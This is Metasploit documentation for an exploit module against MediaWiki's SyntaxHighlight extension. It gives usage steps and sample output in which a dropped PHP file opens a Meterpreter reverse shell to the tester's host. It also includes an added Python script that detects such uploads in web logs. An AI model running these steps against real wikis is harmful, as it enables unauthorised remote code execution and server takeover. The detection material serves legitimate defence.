metasploit-gs/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md
2017-04-29 16:14:25 +02:00


Vulnerable Application

Any MediaWiki installation with the SyntaxHighlight extension version 2.0 installed and enabled. This extension ships with the AIO package of MediaWiki 1.27.x and 1.28.x. The issue was supposed to be fixed in MediaWiki 1.28.1 and 1.27.2. It appears that the fix was pushed to the git repository but, for some reason, was not included in the release packages.

Verification Steps

  1. use exploit/multi/http/mediawiki_syntaxhighlight
  2. set RHOST <ip target site>
  3. set TARGETURI <MediaWiki path>
  4. set UPLOADPATH <writable path in web root>
  5. optionally set RPORT, SSL, and VHOST
  6. exploit
  7. Verify a new Meterpreter session is started

Sample Output

msf > use exploit/multi/http/mediawiki_syntaxhighlight 
msf exploit(mediawiki_syntaxhighlight) > set RHOST 192.168.146.137
RHOST => 192.168.146.137
msf exploit(mediawiki_syntaxhighlight) > set TARGETURI /mediawiki
TARGETURI => /mediawiki
msf exploit(mediawiki_syntaxhighlight) > exploit

[*] Started reverse TCP handler on 192.168.146.197:4444 
[*] Local PHP file: images/bwpqtiqgmeydivskjcjltnldb.php
[*] Trying to run /mediawiki/images/bwpqtiqgmeydivskjcjltnldb.php
[*] Sending stage (33986 bytes) to 192.168.146.137
[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.137:55768) at 2017-04-29 14:27:03 +0200
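
The sample output shows the module writing a randomly named PHP file into the upload path (`images/` here) and then requesting it over HTTP, which leaves a recognisable trace in the web server's access log. The following detection sketch is an added example, not part of the Metasploit module or its documentation; it assumes Apache/nginx combined log format, a wiki rooted at `/mediawiki`, and the `images` upload directory, and the function name and log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Extensions commonly mapped to the PHP handler (assumption; match your server config).
PHP_EXT_RE = re.compile(r'\.(php\d?|phtml|phar)$', re.IGNORECASE)


def find_php_in_uploads(lines, wiki_path="/mediawiki", upload_dir="images"):
    """Return hits for requests to PHP files under the wiki's upload directory.

    Uploaded media should never be executable, so any such request deserves
    triage; a 200 status means the server actually served or ran the file.
    """
    prefix = f"{wiki_path.rstrip('/')}/{upload_dir.strip('/')}/"
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed or non-request lines
        # Drop the query string, decode %xx escapes, collapse duplicate slashes.
        raw_path = m["target"].split("?", 1)[0]
        path = re.sub(r'/{2,}', '/', unquote(raw_path))
        if path.startswith(prefix) and PHP_EXT_RE.search(path):
            hits.append({"src": m["src"], "time": m["ts"], "path": path,
                         "status": int(m["status"]),
                         "served": m["status"] == "200"})
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Apr/2017:14:26:58 +0200] "GET /mediawiki/index.php?title=Main_Page HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [29/Apr/2017:14:27:01 +0200] "GET /mediawiki/images/a/ab/Logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Apr/2017:14:27:03 +0200] "GET /mediawiki/images/qzxkvhwplm.php HTTP/1.1" 200 0 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [29/Apr/2017:14:27:09 +0200] "GET /mediawiki//images/%71zx.PHP?x=1 HTTP/1.1" 404 196 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for hit in find_php_in_uploads(SAMPLE_LOG):
        print(hit)
```

Pair the log check with a web server rule that disables script execution in the upload directory, so a dropped file cannot run even if the extension is still unpatched.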